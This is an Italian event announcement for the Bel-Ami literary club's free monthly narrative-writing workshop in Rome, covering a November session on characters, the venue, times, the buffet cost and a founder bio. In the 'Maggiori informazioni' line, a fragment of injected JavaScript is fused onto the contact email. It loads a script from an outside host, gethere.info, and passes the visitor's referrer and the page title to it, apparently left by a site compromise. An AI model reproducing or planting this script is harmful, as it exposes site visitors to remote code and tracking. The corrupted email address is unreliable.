Il Circolo letterario Bel-Ami inaugura il suo nuovo laboratorio di Narrativa, da ottobre ogni terzo martedì del mese. Inaugurato a ottobre, il nuovo Laboratorio di Narrativa del Circolo letterario Bel-Ami, a cura di Francesca Andreini, prosegue i suoi incontri (ogni terzo martedì del mese) per sperimentare insieme un metodo pratico che faccia della scrittura un processo piacevole, profondo e senza intoppi.
Il 15 novembre affronteremo un altro snodo fondamentale nella concezione di un romanzo, con una serata dedicata ai personaggi della nostra opera.
Diceva Milan Kundera che i personaggi sono degli “io sperimentali” con i quali l’autore “esamina fino in fondo alcuni grandi temi dell’esistenza”.
Dopo aver individuato il mondo che prende vita dal nostro tema, è arrivato il momento di scoprire quali sono le personalità che lo esploreranno, facendoci sperimentare aspetti nuovi e spesso sconosciuti della nostra umanità.

Leggi il calendario completo e se desideri partecipare, scrivi a labonarrativa@bellami.it.

In sintesi
Laboratorio di narrativa “Martedì prosaici”
Ogni terzo martedi del mese
dalle ore 19:30 alle 22:00
Via delle Quattro Fontane, 130
(Zona Metro Barberini)

Costo del laboratorio
Il laboratorio è gratuito. La nostra convenzione con Enoteca letteraria ci permette di usufruire della libreria per gli incontri del laboratorio e di cenare (cena a buffet con degustazione di vino) al costo di 7,00€.

Maggiori informazioni
labonarrativa@bellami.its.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Tagged with:
 
About The Author

Cristiano Sabbatini

Cristiano Sabbatini è nato a Roma il 14 giugno del 1977. Nel 2005 fonda il Circolo letterario Bel-Ami e nel 2008, insieme a tre soci del Circolo, fonda la Bel-Ami Edizioni (casa editrice NO EAP).